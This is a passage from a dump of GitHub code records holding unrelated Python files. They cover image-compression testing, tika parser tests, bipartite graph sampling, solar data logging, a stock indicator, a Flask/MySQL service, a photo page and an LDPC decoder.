self.write_test_img_name(os.path.join(rec_dir, \"depth_rec\"), os.path.join(rec_dir, \"test_depth.txt\"))\n self.write_test_img_name(os.path.join(rec_dir, \"rgb_rec\"), os.path.join(rec_dir, \"test_rgb.txt\"))\n\n def compress_one_image_united(self, x, stream_path, H, W, img_name):\n torch.cuda.synchronize()\n start_time = time.time()\n with torch.no_grad():\n out = self.net.compress(x[0], x[1])\n torch.cuda.synchronize()\n end_time = time.time()\n shape = out[\"shape\"]\n os.makedirs(stream_path[0], exist_ok=True)\n os.makedirs(stream_path[1], exist_ok=True)\n\n rgb_output = os.path.join(stream_path[0], img_name)\n with Path(rgb_output).open(\"wb\") as f:\n write_uints(f, (H, W))\n write_body(f, shape, out[\"r_strings\"])\n size = filesize(rgb_output)\n rgb_bpp = float(size) * 8 / (H * W)\n\n depth_output = os.path.join(stream_path[1], img_name)\n with Path(depth_output).open(\"wb\") as f:\n write_uints(f, (H, W))\n write_body(f, shape, out[\"d_strings\"])\n size = filesize(depth_output)\n depth_bpp = float(size) * 8 / (H * W)\n\n enc_time = end_time - start_time\n return rgb_bpp, depth_bpp, enc_time\n\n def decompress_one_image_united(self, stream_path, img_name, mode=\"reflect0\"):\n rgb_output = os.path.join(stream_path[0], img_name)\n with Path(rgb_output).open(\"rb\") as f:\n original_size = read_uints(f, 2)\n rgb_strings, shape = read_body(f)\n\n depth_output = os.path.join(stream_path[1], img_name)\n with Path(depth_output).open(\"rb\") as f:\n original_size = read_uints(f, 2)\n depth_strings, shape = read_body(f)\n\n torch.cuda.synchronize()\n start_time = time.time()\n with torch.no_grad():\n out = self.net.decompress(rgb_strings, depth_strings, shape)\n torch.cuda.synchronize()\n end_time = time.time()\n dec_time = end_time - start_time\n rgb_x_hat = out[\"x_hat\"][\"r\"]\n depth_x_hat = out[\"x_hat\"][\"d\"]\n if mode.find(\"0\") != -1:\n rgb_x_hat = crop0(rgb_x_hat, original_size)\n depth_x_hat = crop0(depth_x_hat, original_size)\n else:\n rgb_x_hat = crop1(rgb_x_hat, original_size)\n depth_x_hat = crop1(depth_x_hat, original_size)\n return rgb_x_hat, depth_x_hat, dec_time\n","repo_name":"xyy7/ELIC-rgbd","sub_path":"testing/tester_united.py","file_name":"tester_united.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40421520624","text":"import sys\nimport unittest\nif sys.version_info >= (3, 3):\n from unittest import mock\nelse:\n import mock\nimport tika.parser\n\n\nclass CreateTest(unittest.TestCase):\n 'test different services in from_file parsing: Content, Metadata or both in recursive mode'\n\n def test_default_service(self):\n 'parse file using default service'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf')\n self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n @mock.patch('tika.parser._parse')\n @mock.patch('tika.parser.parse1')\n def test_remote_endpoint(self, tika_call_mock, _):\n result = tika.parser.from_file(\n 'filename', 'http://tika:9998/tika')\n\n tika_call_mock.assert_called_with(\n 'all', 'filename', 'http://tika:9998/tika', headers=None, config_path=None,\n requestOptions={})\n def test_default_service_explicit(self):\n 'parse file using default service explicitly'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='all')\n 
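# service='all' mirrors the default call above: both metadata and content should be populated.\n        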
self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n        self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n    def test_text_service(self):\n        'parse file using the content only service'\n        result = tika.parser.from_file(\n            'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='text')\n        self.assertIsNone(result['metadata'])\n        self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n    def test_meta_service(self):\n        'parse file using the metadata only service'\n        result = tika.parser.from_file(\n            'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='meta')\n        self.assertIsNone(result['content'])\n        self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n    def test_invalid_service(self):\n        'parse file using an invalid service should perform the default parsing'\n        result = tika.parser.from_file(\n            'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='bad')\n        self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n        self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"chrismattmann/tika-python","sub_path":"tika/tests/test_from_file_service.py","file_name":"test_from_file_service.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":1359,"dataset":"github-code","pt":"61"} +{"seq_id":"35947388814","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 14 17:32:18 2021\n\n@author: Enrique\n\"\"\"\n\n''' Functions to sample bipartite graphs with prescribed\ndegree sequences, using the sequential algorithm. '''\n\nimport numpy as np\nfrom .sequential_algo_binary import seq_algo_binary\n\ndef bipartite_graph_matrix(m, n):\n    ''' \n    \n    Construct the linear constraint matrix for the \n    bipartite graph problem.\n    \n    Parameters\n    ----------\n    m: number of rows (nodes of first set)\n    n: number of columns (nodes of second set)\n    \n    Returns\n    -------\n    A: matrix of size (m+n)x(mn) \n    \n    '''\n    A = np.zeros([m + n, m*n], dtype=int)\n    A[:m,:] = np.kron(np.eye(m), np.ones(n))\n    A[m:,:] = np.kron(np.ones(m), np.eye(n))\n    return A\n\ndef bipartite_graph_to_binary_instance(r, c):\n    ''' \n    \n    Compute the affine mapping of the bipartite graph instance.\n    \n    Parameters\n    ----------\n    r: row degrees (nodes of first set)\n    c: column degrees (nodes of second set)\n    \n    Returns\n    -------\n    A: matrix of linear mapping\n    b: rhs vector of linear mapping\n    \n    '''\n    m = len(r)\n    n = len(c)\n    A = bipartite_graph_matrix(m, n)\n    b = np.concatenate((r, c))\n    return A, b\n\ndef sample_bipartite_graph(r, c, rule='fixed', dual_method='cvxpy'):\n    ''' \n    \n    Simulate a random bipartite graph x which satisfies the given\n    degree sequences using the sequential maximum entropy algorithm.\n    \n    Parameters\n    ----------\n    r: row degrees (nodes of first set), length m\n    c: column degrees (nodes of second set), length n\n    rule: string, edge selection rule\n    dual_method: string, method for solving the dual of the maximum entropy problem\n    \n    Returns\n    -------\n    x: edge indicator vector of size mxn (1 if edge is present)\n    p: numeric, estimator of p_x, where p_x is the probability of observing x\n    w: numeric, estimator of 1/p_x\n    \n    '''\n    \n    # check feasibility\n    # TODO: implement Gale Ryser or some other criterion\n    # I don't see it in NetworkX\n    \n    # create linear mapping\n    (A, b) = bipartite_graph_to_binary_instance(r, c)\n    \n    # call binary sequential algo\n    x, p, w = seq_algo_binary(A, b, 
rule=rule, dual_method=dual_method)\n return x, p, w\n\ndef vector_to_matrix(x, m, n):\n ''' \n \n Transform a vector in long form into the original mxn matrix.\n \n Parameters\n ----------\n x: mxn vector\n m: number of rows\n n: number of columns\n \n Returns\n -------\n X: mxn matrix with the elements of x \n \n '''\n if len(x) != m*n:\n raise ValueError('length of x is not equal to m*n')\n X = np.reshape(x, (m,n))\n return X\n","repo_name":"enrique-lelodelarrea/entropy-graph-simulation","sub_path":"graphsim/bipartite_graphs.py","file_name":"bipartite_graphs.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15128685266","text":"import logging\nimport os\nimport queue\nimport threading\nimport datetime\n\nimport h5py\nimport numpy as np\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", module='pvlib')\nwarnings.filterwarnings(\"ignore\", module='pysolar')\n\nfrom iv_curves_definitions import HarvestingCondition\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nconsole_log_handler = logging.StreamHandler()\nconsole_log_formatter = logging.Formatter('%(levelname)s - %(message)s')\nconsole_log_handler.setFormatter(console_log_formatter)\nlogger.addHandler(console_log_handler)\n\n\ndef create_conditions(path, thermometer_temperature, solar_cell_model, address=\"Kuglerstraße, Essen,45144\",\n latitude=51.455643, longitude=7.011555, start_time=datetime.datetime.now(),\n end_time=datetime.datetime.now() + datetime.timedelta(seconds=30)):\n import requests\n import urllib\n from dateutil import tz\n import time\n import datetime\n\n import sys\n\n date = str(start_time.strftime(\"%d.%m.%Y\"))\n start_time = str(start_time.strftime(\"%H:%M:%S.%f\"))\n end_time = str(end_time.strftime(\"%H:%M:%S.%f\"))\n\n try:\n if address != \"Kuglerstraße, Essen,45144\":\n url = 'https://nominatim.openstreetmap.org/search/' + urllib.parse.quote(address) + '?format=json'\n response = requests.get(url).json()\n latitude = round(float(response[0][\"lat\"]), 7)\n longitude = round(float(response[0][\"lon\"]), 7)\n except:\n print(\n \"An error occurred while connecting to the openstreetmap.org. 
Please check your connection and try again.\")\n sys.exit()\n\n from timezonefinder import TimezoneFinder\n tf = TimezoneFinder()\n timezone = tf.timezone_at(lng=longitude, lat=latitude)\n\n def create_prognoes_conditions():\n dict_temp = {\"start_time\": str(\n datetime.datetime.strptime(date + ' ' + start_time, \"%d.%m.%Y %H:%M:%S.%f\").timestamp()),\n \"end_time\": str(\n datetime.datetime.strptime(date + ' ' + end_time, \"%d.%m.%Y %H:%M:%S.%f\").timestamp()),\n \"thermometer_temperature\": thermometer_temperature, \"address\": address,\n \"latitude\": str(latitude), \"longitude\": str(longitude),\n \"solar_cell\": solar_cell_model}\n\n f = h5py.File(path, 'a')\n dt = h5py.string_dtype(encoding='utf-8')\n dsetx = f.create_dataset(\"prognoes_conditions\", (2, 7), dtype=dt)\n dsetx[0] = list(dict_temp.keys())\n dsetx[1] = list(dict_temp.values())\n\n def create_weather_conditions():\n def get_nearest_station_mowesta_forecast_current_hour():\n import sys\n import os\n sys.path.append(os.path.abspath('../'))\n from mowesta import mowesta_day_minute\n\n result = {\"timestamp\": str(time.time()), \"temperature\": \"Not Available\", \"total_clouds\": \"Not Available\",\n \"precipitation\": \"Not Available\", \"snowDepth\": \"Not Available\", \"windSpeed\": \"Not Available\",\n \"humidity\": \"Not Available\", \"pressure\": \"Not Available\", \"pysolar_cs_ghi\": \"Not Available\",\n \"IandP_cs_ghi\": \"Not Available\", \"cs_ghi\": \"Not Available\",\n \"cs_dni\": \"Not Available\", \"cs_dhi\": \"Not Available\", \"cn_ghi\": \"Not Available\",\n \"cn_dni\": \"Not Available\", \"cn_dhi\": \"Not Available\"\n }\n\n result_day, result_minute, result_minute_dict = mowesta_day_minute(address=address,\n date=datetime.datetime.now())\n\n if not result_minute.empty:\n dict_temp = result_minute.to_dict()\n dict_temp['timestamp'] = {0: str(datetime.datetime.utcnow().timestamp())}\n\n for key, value in dict_temp.items():\n for keys, values in value.items():\n result.update({key: str(values)})\n return result\n\n dict_temp = get_nearest_station_mowesta_forecast_current_hour()\n f = h5py.File(path, 'a')\n dt = h5py.string_dtype(encoding='utf-8')\n dsetx = f.create_dataset(\"weather_conditions\", (2, 16), dtype=dt)\n dsetx[0] = list(dict_temp.keys())\n dsetx[1] = list(dict_temp.values())\n\n def create_weather_irradiation_conditions():\n import sys\n import os\n sys.path.append(os.path.abspath('../'))\n from pvlib_functions import GFS_day_minute\n result = {'timestamp': str(time.time()), 'temp_air': \"Not Available\", 'wind_speed': \"Not Available\",\n 'total_clouds': \"Not Available\",\n 'low_clouds': \"Not Available\", 'mid_clouds': \"Not Available\",\n 'high_clouds': \"Not Available\", 'GFS_ghi': \"Not Available\", 'cs_ghi': \"Not Available\",\n 'cs_dni': \"Not Available\",\n 'cs_dhi': \"Not Available\", 'cn_ghi': \"Not Available\",\n 'cn_dni': \"Not Available\", 'cn_dhi': \"Not Available\"}\n\n date = datetime.datetime.now()\n result_day, result_minute, result_minute_dict = GFS_day_minute(address, timezone, date)\n\n if not result_minute.empty:\n dict_temp = result_minute.to_dict()\n dict_temp['timestamp'] = {0: str(datetime.datetime.now(tz=tz.gettz(timezone)))}\n\n for key, value in dict_temp.items():\n for keys, values in value.items():\n result.update({key: str(values)})\n import h5py\n f = h5py.File(path, 'a')\n dt = h5py.string_dtype(encoding='utf-8')\n dsetx = f.create_dataset(\"irradiation_weather_conditions\", (2, 14), dtype=dt)\n dsetx[0] = list(result.keys())\n dsetx[1] = 
list(result.values())\n\n return result_day, result_minute\n\n create_prognoes_conditions()\n create_weather_conditions()\n create_weather_irradiation_conditions()\n return True\n\n\ndef generate_filename(_file_name) -> str:\n if _file_name == 'AUTO-GENERATE':\n for files in os.walk('data'):\n number_of_files_in_directory = len(files[2])\n if number_of_files_in_directory == 0:\n return 'trace_0.hdf5'\n # TODO Is this too hacky?\n list_of_file_names = files[2]\n highest_file_index = 0\n for file_name_without_extension in list_of_file_names:\n file_name_without_extension = file_name_without_extension.split('.')\n index_of_trace_file = file_name_without_extension[0].split('_')\n if int(index_of_trace_file[1]) > highest_file_index:\n highest_file_index = int(index_of_trace_file[1])\n new_filename = 'trace_' + str(highest_file_index + 1) + '.hdf5'\n # TODO Add more error handling for the files already present in the directory\n return new_filename\n else:\n return _file_name\n\n\ndef write_iv_curves_to_disk(_iv_curves_queue: queue.Queue, _file_name, address, temperature, solar_cell_model,\n _harvesting_condition: HarvestingCondition,\n _stop_thread_event: threading.Event):\n curve_counter = 0\n data_array_buffer = []\n\n new_filename = '../data/SOCRAETES/' + generate_filename(_file_name)\n # new_filename = 'data/' + str(datetime.datetime.now().strftime(\"%m-%d-%Y--%H-%M-%S\")) + \".hdf5\"\n\n start_time = datetime.datetime.now()\n start_time_string = str(start_time.hour) + ':' + str(start_time.minute) + ':' + str(start_time.second) + '.' + \\\n str(start_time.microsecond)\n start_date_string = str(start_time.day) + '.' + str(start_time.month) + '.' + str(start_time.year)\n\n while True:\n if _stop_thread_event.isSet():\n end_time = datetime.datetime.now()\n end_time_string = str(end_time.hour) + ':' + str(end_time.minute) + ':' + str(end_time.second) + '.' 
+ \\\n                      str(end_time.microsecond)\n\n            logger.info(\"Committing curve data to the hard disk...\")\n            with h5py.File(new_filename, 'a') as f:\n                harvesting_condition_list = [(np.string_('Date'),\n                                              np.string_('Start Time (Local Timezone)'),\n                                              np.string_('End Time (Local Timezone)'),\n                                              np.string_('Indoor/Outdoor'),\n                                              np.string_('Light Intensity (Lux)'),\n                                              np.string_('Weather Condition'),\n                                              np.string_('Country'),\n                                              np.string_('City')),\n                                             (np.string_(start_date_string),\n                                              np.string_(start_time_string),\n                                              np.string_(end_time_string),\n                                              np.string_(_harvesting_condition.indoor_or_outdoor),\n                                              np.string_(_harvesting_condition.light_intensity),\n                                              np.string_(_harvesting_condition.weather_condition),\n                                              np.string_(_harvesting_condition.country),\n                                              np.string_(_harvesting_condition.city))]\n                dataset = f.create_dataset('harvesting conditions', data=harvesting_condition_list)\n                create_conditions(path=new_filename, address=address, thermometer_temperature=temperature,\n                                  solar_cell_model=solar_cell_model, end_time=end_time)\n            for arr in data_array_buffer:\n                with h5py.File(new_filename, 'a') as f:\n                    dataset = f.create_dataset('curve' + str(curve_counter), data=arr, dtype='f')\n                    curve_counter += 1\n            break\n\n        if not _iv_curves_queue.empty():\n            iv_curve = _iv_curves_queue.get()\n            x_temp = []\n            y_temp = []\n            for c in iv_curve.curve_points_list:\n                x_temp.append(c.x)\n                y_temp.append(c.y)\n\n            data_array = np.array([x_temp, y_temp], dtype=float)\n            data_array_buffer.append(data_array)\n","repo_name":"SepehrMosavat/PROGNOES","sub_path":"SOCRAETES/disk_io_functions.py","file_name":"disk_io_functions.py","file_ext":"py","file_size_in_byte":10338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23566179741","text":"import re\nimport printing as p\n\ndef main ():\n    done = p.ask(\"Is this moving to Done? y/n\")\n    done = done.lower()\n    if done != 'y':\n        nwr = p.ask(\"Is this a 'No work required'? y/n\")\n        if nwr != 'y':\n            p.err(\"If it's not 'Done' or 'No work required', idk what you're on.\")\n            return\n        comment = get_nwr_comment()\n    else:\n        comment = get_done_comment()\n    if comment == \"\":\n        return\n    comment = comment.rstrip()\n    p.info(\"===== START =====\")\n    p.info(\"\")\n    p.info(comment)\n    p.info(\"\")\n    p.info(\"===== END =====\")\n\ndef get_done_comment ():\n    fix_version = p.ask(\"What version was this fixed in?\")\n    fix_version = fix_version.upper()\n    if fix_version[0] != \"V\":\n        fix_version = \"V\" + fix_version\n    if not validate_version(fix_version): \n        fix_version = p.ask(\"Please enter a proper fix version.\").upper()\n        if fix_version and fix_version[0] != \"V\":\n            fix_version = \"V\" + fix_version\n        if not validate_version(fix_version):\n            p.err(\"Tell me what version it was fixed in, you spudnugget.\")\n            return \"\"\n    user_info = p.ask(\"What was wrong? (For dummies)\")\n    support_info = p.ask(\"Any support notes?\")\n    dev_notes = p.ask(\"Any dev notes?\")\n    cherry_pick_info = p.ask(\"Cherry-picking notes? [Standard 48hrs]\")\n\n    if is_no(cherry_pick_info):\n        cherry_pick_info = \"Standard 48hrs\"\n\n    comment = add_to_comment(\"\", \"Fixed in Version\", fix_version)\n    comment = add_to_comment(comment, \"User-targeted Info\", user_info)\n    comment = add_to_comment(comment, \"Frontline Info\", support_info)\n    comment = add_to_comment(comment, \"Dev Info\", dev_notes)\n    comment = add_to_comment(comment, \"Cherry-Picking\", cherry_pick_info)\n\n    return comment \n\ndef get_nwr_comment ():\n    reason = p.ask(\"Why doesn't this require work? 
O_o\")\n support_info = p.ask(\"Got any more information to help support?\")\n \n comment = add_to_comment(\"\", \"Reasoning\", reason)\n comment = add_to_comment(comment, \"Next steps for the frontline\", support_info)\n \n return comment\n\ndef validate_version (version):\n return (not is_no(version) and re.match(r\"V[0-9]{1,3}\\.[0-9]+\", version)) \n\ndef add_to_comment (comment, section, info):\n if is_no(info):\n info = \"N/A\"\n new_comment = comment + \"*\" + section + \":* \" + info + \"\\n\"\n return new_comment\n\ndef is_no (string):\n string = string.lower()\n re.sub(r'\\W+', '', string)\n return string == \"\" or string == \"n\" or string == \"no\" or string == \"none\" or string == \"na\" or string == \"nah\" or string == \"nope\" or string == \"not really\"\n\n# Then connect to Jira, execute the transaction, and add the comment in\n\n# Initially, we want to do this as a command line thing, but then maybe add a UI? Sounds like work though...\n\nmain()\n","repo_name":"watsonben/golden-tickets","sub_path":"golden-ticket-standard/make-golden-ticket.py","file_name":"make-golden-ticket.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16924042375","text":"import math, operator\n\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport talib\n\nfrom ..DyStockSelectStrategyTemplate import *\n\n\nclass DySS_BBands(DyStockSelectStrategyTemplate):\n name = 'DySS_BBands'\n chName = '布林'\n\n colNames = ['代码', '名称', '标准差均值比(%)', '当日收盘价下轨线离差比', '当日最低价下轨线离差比']\n\n param = OrderedDict\\\n ([\n ('基准日期', datetime.today().strftime(\"%Y-%m-%d\")),\n ('向前N日周期', 10),\n ('选几只股票', 50)\n ])\n\n def __init__(self, param, info):\n super().__init__(param, info)\n\n # unpack parameters\n self._baseDate = param['基准日期']\n self._forwardNDays = param['向前N日周期']\n self._selectStockNbr = param['选几只股票']\n\n def onDaysLoad(self):\n return self._baseDate, -self._forwardNDays + 1\n\n def onInit(self, dataEngine, errorDataEngine):\n self._stockAllCodes = dataEngine.daysEngine.stockAllCodes\n \n self._startDay = dataEngine.daysEngine.tDaysOffset(self._baseDate, -self._forwardNDays + 1)\n self._endDay = dataEngine.daysEngine.tDaysOffset(self._baseDate, 0)\n\n def onStockDays(self, code, df):\n # 计算布林线\n upper, middle, lower = self._bbands(df)\n if middle is None: return\n\n # 计算标准差\n std = upper[-1] - middle[-1]\n if std == 0: return\n\n close = df.ix[self._endDay, 'close']\n low = df.ix[self._endDay, 'low']\n\n # 计算标准差均值比\n stdMeanRatio = std*100/middle[-1]\n if close < middle[-1]:\n stdMeanRatio *= -1\n\n # 计算比例\n closeRatio = (close - lower[-1])/std\n lowRatio = (low - lower[-1])/std\n\n # 设置结果\n pair = [code, self._stockAllCodes[code], stdMeanRatio, closeRatio, lowRatio]\n self._result.append(pair)\n self._result.sort(key=operator.itemgetter(2))\n\n self._result = self._result[:self._selectStockNbr]\n\n def _bbands(self, df):\n try:\n close = df['close']\n except Exception as ex:\n return None, None, None\n\n if close.shape[0] != self._forwardNDays:\n return None, None, None\n\n try:\n upper, middle, lower = talib.BBANDS(\n close.values, \n timeperiod=self._forwardNDays,\n # number of non-biased standard deviations from the mean\n nbdevup=1,\n nbdevdn=1,\n # Moving average type: simple moving average here\n matype=0)\n except Exception as ex:\n return None, None, None\n\n return upper, middle, 
lower\n","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Select/Strategy/Cta/DySS_BBands.py","file_name":"DySS_BBands.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"} +{"seq_id":"13105619718","text":"import configparser\nimport logging\n\n\nclass Configuration:\n    def __init__(self, config_file_path):\n        self.config = dict()\n        self._config_parser = configparser.ConfigParser()\n\n        try:\n            config_file = open(config_file_path, \"r\")\n            self._config_parser.read_file(config_file)\n        except (OSError, IOError) as e:\n            err_msg = \"Error reading configuration from file \" + \\\n                config_file_path\n            raise ValueError(err_msg, e)\n\n        try:\n            logging.info(\"Reading configuration...\")\n            self.__read_language_configuration()\n            self.__read_twitter_configuration()\n            self.__read_mongodb_configuration()\n            logging.info(\"Configuration read correctly.\")\n        except Exception as e:\n            err_msg = \"Error reading configuration parameters from file \" + \\\n                config_file_path\n            raise ValueError(err_msg, e)\n\n    def __read_language_configuration(self):\n        logging.debug(\"Reading language configuration...\")\n\n        lang_conf = self.config[\"language\"] = {}\n\n        lang_conf[\"locale\"] = self._config_parser.get(\n            \"language\", \"locale\")\n\n        logging.debug(\"Language configuration read correctly.\")\n\n    def __read_twitter_configuration(self):\n        logging.debug(\"Reading Twitter configuration...\")\n\n        twitter_conf = self.config[\"twitter\"] = {}\n\n        twitter_conf[\"consumer_key\"] = self._config_parser.get(\n            \"twitter\", \"consumer_key\")\n        twitter_conf[\"consumer_secret\"] = self._config_parser.get(\n            \"twitter\", \"consumer_secret\")\n        twitter_conf[\"access_token_key\"] = self._config_parser.get(\n            \"twitter\", \"access_token_key\")\n        twitter_conf[\"access_token_secret\"] = self._config_parser.get(\n            \"twitter\", \"access_token_secret\")\n\n        logging.debug(\"Twitter configuration read correctly.\")\n\n    def __read_mongodb_configuration(self):\n        logging.debug(\"Reading MongoDB configuration...\")\n\n        mongo_conf = self.config[\"mongodb\"] = {}\n\n        mongo_conf[\"uri\"] = self._config_parser.get(\"mongodb\", \"uri\")\n        mongo_conf[\"database\"] = self._config_parser.get(\"mongodb\", \"database\")\n        mongo_conf[\"user\"] = self._config_parser.get(\"mongodb\", \"user\")\n        mongo_conf[\"password\"] = self._config_parser.get(\"mongodb\", \"password\")\n        mongo_conf[\"mechanism\"] = self._config_parser.get(\"mongodb\",\n                                                          \"mechanism\")\n\n        logging.debug(\"MongoDB configuration read correctly.\")\n","repo_name":"logoff/almanac-bot","sub_path":"almanacbot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43545568264","text":"from flask import Flask\nfrom flaskext.mysql import MySQL\nimport requests\nfrom controller import postData\nfrom controller import sortList\n\napp = Flask(__name__)\nmysql = MySQL()\n\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = 'root'\napp.config['MYSQL_DATABASE_PASSWORD'] = ''\napp.config['MYSQL_DATABASE_DB'] = 'citi'\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\n\nmysql.init_app(app)\n\nwith mysql.connect().cursor() as cursor:\n    cursor.execute(open(\"DB_script/schema.sql\", \"r\").read())\n\n\n@app.route('/post_data', methods=['GET', 'POST'])\ndef post():\n    max_price, location = postData.get_parameters()\n    # the module-level cursor is closed once the schema has been applied, so open a fresh one per request\n    cursor = mysql.connect().cursor()\n    data = postData.list_data(max_price, location, cursor)\n    
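# Rank the fetched properties with respect to the requested location before forwarding them.\n    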
sorted_data = sortList.sort_property_list(data, location)\n url = 'http://localhost:8000/'\n headers = {'Content-type': 'text/html; charset=UTF-8'}\n requests.post(url, data=sorted_data, headers=headers)\n return sorted_data\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0',port=5000)","repo_name":"CitiHackers/ServerSide","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34063248323","text":"\"\"\" Code to photo web page \"\"\"\nimport os\nimport io\nimport random\nfrom flask import render_template, abort, send_file\nfrom wand.image import Image\nfrom wand.resource import limits\nfrom src.helpers.app import AppHelper # pylint: disable=import-error\nfrom src.helpers import paths # pylint: disable=import-error\n\ndef add_photo_page(app, app_helper:AppHelper):\n \"\"\" Add Home Page \"\"\"\n @app.route(\"/photo\")\n @app.route('/photo/')\n def photo_page(refresh=900):\n \"\"\" Photo Page \"\"\"\n app_helper.prom_metrics.counter__requests__photo_page.inc()\n try:\n disk_photos = paths.get_files_on_disk(app_helper.configs.photo_location)\n photo = random.choice(list(disk_photos.keys()))\n return render_template('photo.html', URL=photo)\n except:\n return render_template('home.html', URL=\"\")\n\n @app.route('/photo/')\n def photo_contents(filename=\"\"):\n if filename == \"\":\n app_helper.prom_metrics.counter__error__404.inc()\n abort(404)\n disk_photos = paths.get_files_on_disk(app_helper.configs.photo_location)\n if filename not in disk_photos:\n app_helper.prom_metrics.counter__error__404.inc()\n abort(404)\n if not os.path.isfile(disk_photos[filename]['file_path']):\n app_helper.prom_metrics.counter__error__404.inc()\n abort(404)\n \n # Use 1GB of ram before writing temp data to disk.\n limits['memory'] = 1024 * 1024 * 1024\n # Reject images larger than 100000x100000.\n limits['width'] = 100000\n limits['height'] = 100000\n with Image(filename=disk_photos[filename]['file_path']) as img:\n return send_file(\n io.BytesIO(img.make_blob('jpeg')),\n mimetype='image/jpeg',\n as_attachment=False,\n download_name='%s.jpg' % disk_photos[filename]['file_name'])\n","repo_name":"Tomcuzz/icloud-photo-utils","sub_path":"src/pages/photo_page.py","file_name":"photo_page.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23566179741","text":"from timeit import default_timer as timer\r\nimport math\r\n\r\ndef stalls(n, k):\r\n l = math.floor(math.log(k, 2))\r\n p = k - 2**l + 1\r\n sum_l = n - 2**l + 1\r\n x = math.floor(sum_l / 2**l) + 1\r\n n_x = sum_l % 2**l\r\n x = x - int(p > n_x)\r\n\r\n# print l, p, x, n_x\r\n if x % 2 == 0:\r\n return int(x/2), int(x/2 -1)\r\n else:\r\n return int((x-1)/2), int((x-1)/2)\r\n\r\nstart = timer()\r\nfilename = 'C-small-2-attempt0'\r\nf = open(filename + '.in', 'r')\r\ng = open(filename + '.out', 'w')\r\nt = int(f.readline())\r\n\r\nfor i in xrange(1, t+1):\r\n\tn, k = [int(j) for j in f.readline().split(' ')]\r\n\trs, ls = stalls(n, k)\r\n\tg.write('Case #' + str(i) + ': ' + str(rs) + ' ' + str(ls) + '\\n')\r\n\r\nf.close()\r\ng.close()\r\nend = timer()\r\nprint (end - 
start)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1048.py","file_name":"1048.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9258879434","text":"from gnuradio import gr, blocks\nimport ldpc\n\nclass ldpc_hier_decoder_fb(gr.hier_block2):\n \"\"\"\n docstring for block ldpc_hier_decoder_fb\n \"\"\"\n def __init__(self, alist_file, sigma, max_iterations):\n gr.hier_block2.__init__(self,\n \"ldpc_hier_decoder_fb\",\n gr.io_signature(1, 1, gr.sizeof_float), # Input signature\n gr.io_signature(1, 1, gr.sizeof_char)) # Output signature\n\n # Define blocks and connect them\n decoder = ldpc.ldpc_decoder_fb(alist_file,\n sigma, max_iterations)\n K = decoder.get_K()\n N = decoder.get_N()\n str2Nvec = blocks.stream_to_vector(4, N)\n Kvec2str = blocks.vector_to_stream(1, K)\n\n self.connect(self, str2Nvec, decoder, Kvec2str, self)\n","repo_name":"manuts/gr-ldpc","sub_path":"python/ldpc_hier_decoder_fb.py","file_name":"ldpc_hier_decoder_fb.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"26537787772","text":"\n# include libraries.\n\nfrom bs4 import BeautifulSoup\nimport csv\nimport datetime\nimport urllib.request\nimport pandas as pd\nimport os\n\n# In command line, you will get a name of state. ex: AL\n\n# as you can see, this is some urls of data-page.\nhtml_doc = ''\nurl1 = 'https://www.aoml.noaa.gov/hrd/hurdat/UShurrs_detailed.html'\nurl2 = 'https://www.aoml.noaa.gov/hrd/hurdat/uststorms.html'\n\nexport_date = datetime.datetime.now()\nexport_xlsfname = export_date.strftime('%m') + '.' + \\\n export_date.strftime('%d') + '.' + \\\n export_date.strftime('%Y') + '.xlsx'\nif os.path.exists(export_xlsfname):\n try:\n os.rename(export_xlsfname, export_xlsfname + '_')\n os.rename(export_xlsfname + '_', export_xlsfname)\n except OSError as e:\n print(\"Excel file opened. 
